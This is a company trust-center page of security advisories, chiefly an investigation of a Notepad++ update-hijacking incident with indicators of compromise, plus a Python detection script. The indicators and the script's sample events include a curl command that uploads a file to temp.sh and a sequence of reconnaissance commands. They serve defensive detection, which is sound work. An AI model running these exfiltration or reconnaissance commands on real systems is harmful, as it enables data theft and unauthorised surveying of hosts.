Welcome to Automox's Trust Center. Our commitment to data privacy and security is embedded in every part of our business. Use this Trust Center to learn about our security posture and request access to our security documentation.
Our Automox Security Team embodies over three decades of operational expertise in designing and safeguarding large-scale, multi-tenant cloud and internet applications. In line with our dedication to fostering transparency and security, we mandate that all team members undergo stringent background checks before employment. This proactive approach ensures that our team operates in an environment that is both secure and transparent, reinforcing our commitment to creating a safer world.
Documents
Security Advisory: Notepad++ Hijacking Incident and Automox Verification
Date: February 2nd, 2026
Status: Investigated – No Impact Identified
Summary
Automox is aware of the recent security incident involving the Notepad++ (NPP) update mechanism. Following a comprehensive investigation by our security team, we have confirmed that Automox customers did not receive malicious updates or traffic through the Automox platform.
Our Investigation & Verification
Upon learning of the incident, Automox conducted a deep-dive audit of our Notepad++ update pipeline:
- Direct Sourcing: We have verified that all Notepad++ updates provided through the Automox console were pulled directly from the official Notepad++ GitHub repository.
- Pipeline Isolation: The Automox updater service is architected to deploy the software directly; it does not activate the internal Notepad++ updater pipeline (GUP.exe), which was the primary vector for this incident.
- Manual Binary Scrutiny: Out of an abundance of caution, our Security team pulled all Notepad++ binaries that passed through our PatchSafe™ service during the affected timeframe. These binaries underwent high-level scrutiny and forensic analysis to ensure no malicious code was deployed.
Customer Impact
Based on these findings, we believe our customers remain protected. However, it is important to note that Automox cannot account for updates or manual installations performed outside of the Automox platform.
We recommend that security teams review the Indicators of Compromise (IoCs) below to ensure the integrity of their broader environment.
Indicators of Compromise (IoCs)
If you suspect an endpoint may have been compromised via a manual Notepad++ update outside of Automox, please monitor for the following activity:
Network & Process Behavior
- Unauthorized Network Requests: Monitor gup.exe for any network requests to domains other than:
  - notepad-plus-plus.org
  - github.com
  - release-assets.githubusercontent.com
- Unusual Process Spawns: gup.exe should typically only spawn explorer.exe or npp* themed installers. Any other sub-processes should be treated as suspicious.
- Signature Verification: For versions 8.8.7 and 8.8.8, installers must have valid digital signatures signed by GlobalSign.
File System Activity
- Suspicious Temp Files: Look for files named update.exe or AutoUpdater.exe located in the user TEMP folder, specifically where gup.exe has write or execute permissions.
- Reconnaissance Activity: Detection of curl.exe (bundled with Windows 10+) calling out to temp.sh for data exfiltration.
  - Example: curl.exe -F "file=@.txt" -s https://temp.sh/upload
Host-Based Reconnaissance Commands
The following commands executed in sequence or via a suspicious parent process may indicate post-compromise activity:
cmd /c netstat -ano >> a.txt
cmd /c systeminfo >> a.txt
cmd /c tasklist >> a.txt
cmd /c whoami >> a.txt
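The indicators above can be turned into detection logic over endpoint telemetry. The following Python is an added example, not Automox's code: the event schema, rule names, sample events and the threshold of three distinct reconnaissance tools are assumptions, while the file names, domains and commands are the ones listed in this advisory.

```python
import fnmatch
import ntpath
from urllib.parse import urlsplit

# Names and allow-lists from the advisory; the event schema is an assumption.
GUP_DOMAINS = {"notepad-plus-plus.org", "github.com", "release-assets.githubusercontent.com"}
GUP_CHILDREN = ("explorer.exe", "npp*")
TEMP_NAMES = {"update.exe", "autoupdater.exe"}
RECON = ("netstat", "systeminfo", "tasklist", "whoami")

def check_event(ev):
    """Return the advisory IoCs matched by one process or network event."""
    path = ev["image"].lower()
    image = ntpath.basename(path)
    if ev["type"] == "network":  # exact-host match against the allow-list
        bad = image == "gup.exe" and ev["dest"].lower() not in GUP_DOMAINS
        return ["gup_unexpected_domain"] if bad else []
    parent = ntpath.basename(ev["parent"].lower())
    checks = {
        "gup_unusual_child": parent == "gup.exe" and not any(
            fnmatch.fnmatchcase(image, pat) for pat in GUP_CHILDREN),
        "temp_dropper": image in TEMP_NAMES and "\\temp\\" in path,
        "curl_temp_sh": image == "curl.exe" and any(
            urlsplit(t).hostname == "temp.sh" for t in ev.get("cmdline", "").split()),
    }
    return [name for name, hit in checks.items() if hit]

def recon_hosts(events, threshold=3):
    """Endpoints where >= threshold (assumed) distinct recon tools ran via cmd /c."""
    seen = {}
    for ev in events:
        cmd = ev.get("cmdline", "").lower().split()
        if cmd[:2] == ["cmd", "/c"] and ">>" in cmd and cmd[2] in RECON:
            seen.setdefault(ev["host"], set()).add(cmd[2])
    return sorted(h for h, tools in seen.items() if len(tools) >= threshold)

# Constructed sample events, not real telemetry.
GUP = r"C:\Program Files\Notepad++\updater\gup.exe"
TMP, SYS = "C:\\Users\\u\\AppData\\Local\\Temp\\", "C:\\Windows\\System32\\"
def event(kind, host, image, **kw):
    return {"type": kind, "host": host, "image": image, **kw}
EVENTS = [
    event("network", "ws01", GUP, dest="github.com"),
    event("network", "ws02", GUP, dest="cdn.example.invalid"),
    event("process", "ws01", TMP + "npp.8.8.8.Installer.x64.exe", parent=GUP),
    event("process", "ws02", TMP + "update.exe", parent=GUP),
    event("process", "ws02", SYS + "curl.exe", parent=TMP + "update.exe",
          cmdline='curl.exe -F "file=@.txt" -s https://temp.sh/upload'),
] + [event("process", "ws02", SYS + "cmd.exe", parent=TMP + "update.exe",
           cmdline=f"cmd /c {t} >> a.txt") for t in RECON]
```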
Security Update – React2Shell (CVE-2025-55182)
Automox’s Security team proactively evaluated our environment for any potential exposure to the React2Shell vulnerability (CVE-2025-55182). Using a purpose-built scanner and direct verification of framework versions, we confirmed that Automox’s web applications do not exhibit the vulnerable behavior and utilize React versions not affected by this issue.
At this time, there is no evidence of vulnerability or impact to Automox systems or customer data. We continue to perform routine validation across all components as part of our ongoing security best practices.
Automox will update this advisory promptly if new information becomes available.
F5 Security Incident
Automox utilizes the open-source version of NGINX, which is maintained by F5, Inc. Following F5’s disclosure of a security incident in August 2025 involving certain internal systems, Automox conducted an internal review to assess any potential impact to our environments or customers.
Based on F5’s official disclosure and our independent verification, Automox systems were not affected. F5 has publicly stated:
“We have no evidence that the threat actor accessed or modified the NGINX source code or product development environment, nor do we have evidence they accessed or modified our F5 Distributed Cloud Services or Silverline systems.”
— F5 Security Incident Disclosure
Link: https://my.f5.com/manage/s/article/K000154696
Automox continues to monitor the situation and maintain communication with trusted partners to ensure the integrity and security of our software supply chain.
Salesloft Drift Incident
Automox discontinued use of the Drift product, including the Salesforce integration, in April 2025. Per our standard practice, the API keys that allowed Drift to integrate with our Salesforce tenant were disabled.
On August 25, 2025, the Automox security team was alerted by an industry partner that our name had appeared in a non-public victim list. We were able to ascertain the precise job ID of the query that the actor attempted to run against our Salesforce tenant on August 18th. Salesforce Support confirmed to us that the query was unsuccessful and returned no data. We also confirmed that additional indicators from various threat reports were not run against the Automox Salesforce tenant.
Regardless, we immediately rotated all API keys and credentials stored in Salesforce, including Salesforce credentials themselves. We further conducted a proactive investigation of all systems which had Drift integrations between August 8th and 18th, but we found no anomalous activity. We disabled any remaining integrations from Drift to our internal systems.
Notepad++ flagged by EDR Software
There was a recent update pushed for version 8.8.3. The Notepad++ team provided an update on their blog as well. The relevant links are below.
https://notepad-plus-plus.org/news/v883-self-signed-certificate/
We are aware of EDR software flagging Notepad++ as malware. The maintainers are also aware of this issue and have posted to their website; a related GitHub issue was posted last week as well. Moreover, PatchSafe caught Notepad++ and our Security Operations team investigated and determined that it was a false positive. The relevant links are below.
https://notepad-plus-plus.org/news/8.8.2-available-in-1-week-without-certificate/
https://github.com/notepad-plus-plus/notepad-plus-plus/issues/16770